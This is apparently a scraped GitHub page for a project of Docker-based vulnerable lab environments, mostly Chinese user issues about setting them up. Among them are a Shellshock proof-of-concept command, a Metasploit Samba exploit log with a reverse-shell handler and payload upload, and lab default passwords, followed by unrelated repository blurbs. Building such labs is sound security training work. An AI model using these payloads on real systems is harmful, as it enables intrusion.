medicean / vulapps Goto Github PK
View Code? Open in Web Editor NEW快速搭建各种漏洞环境(Various vulnerability environment)
Home Page: http://vulapps.evalbug.com/
License: GNU General Public License v3.0
快速搭建各种漏洞环境(Various vulnerability environment)
Home Page: http://vulapps.evalbug.com/
License: GNU General Public License v3.0
<@s.hidden name="redirectUri" value="%{redirectUri}" />
value这里不会显示执行的结果
如题
medicean/vulapps:r_redis_1 这个中科大没有
medicean/vulapps:n_nagios_1
medicean/vulapps:o_openssl_heartbleed 这两个用中科大特别慢
解决办法:registry-mirror=https://2h3po24q.mirror.aliyuncs.com 特别快
师傅,wordpress环境中的几个环境的七牛云过期了orz
请问博主,比如你的Struts2 这类javaweb漏洞的war包有源码吗?
按照这里的POC, https://seclists.org/oss-sec/2014/q3/688, 在bash执行下面的命令
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
会在当前文件夹下生成一个名字叫echo
的文件, 文件的内容是 date
命令的结果,
但是在 docker.io/medicean/vulapps:b_bash_shellshock2 这个镜像里执行不成功.
谢谢分享,048的洞刚出来,这个漏洞搭建平台就更新了,蟹蟹 谢谢
FROM tomcat:8-jre8
MAINTAINER [email protected]
ENV WAR_URL http://ocnf2x3pk.bkt.clouddn.com/S2-019.war
WORKDIR /tmp
RUN set -ex \
&& rm -rf /usr/local/tomcat/webapps/* \
&& chmod a+x /usr/local/tomcat/bin/*.sh \
&& wget -qO /usr/local/tomcat/webapps/ROOT.war $WAR_URL
EXPOSE 8080
环境搭建失败,http://ocnf2x3pk.bkt.clouddn.com/S2-019.war的链接好像失效里,struts2里还有好几个失效的
I have installed docker and then I have done scanning with nmap there is no port related to ajp. I have also checked the server.xml file.
看src/start.sh里的code
if [[ "$EMAIL_ADDR" && "$EMAIL_PASSWORD" ]]; then
sed -i "s/[email protected]/${EMAIL_ADDR}/g" /htdocs/ant-master/web/modules/mail.js
sed -i "s/email-password/${EMAIL_PASSWORD}/g" /htdocs/ant-master/web/modules/mail.js
fi
按照您的前几步,我获取到了docker镜像并且成功运行了起来。
并且能够和我的物理机互相ping通。
现在我利用msf 执行后的结果显示
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 172.17.0.2:445 - Using location \\172.17.0.2\share\ for the path
[*] 172.17.0.2:445 - Retrieving the remote path of the share 'share'
[*] 172.17.0.2:445 - Share 'share' has server-side path '/tmp/
[*] 172.17.0.2:445 - Uploaded payload to \\172.17.0.2\share\kJJBfBuJ.so
[*] 172.17.0.2:445 - Loading the payload from server-side path /tmp/kJJBfBuJ.so using \\PIPE\/tmp/kJJBfBuJ.so...
[-] 172.17.0.2:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.17.0.2:445 - Loading the payload from server-side path /tmp/kJJBfBuJ.so using /tmp/kJJBfBuJ.so...
[-] 172.17.0.2:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
https://hub.docker.com/r/medicean/vulapps
author的密码写错了,试了一下是author4wp498
使用了CVE2017-12615tomcat远程代码执行漏洞,测试不成功,进入容器发现readonly的值为true。
I don't know how to change cookie of poc.py. Would you please tell me how to do that?
管理员账号密码 是 [email protected] 123456 吧?怎么登不上去嘞?
那我注册一下?
结果也注册不了欸。。。
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.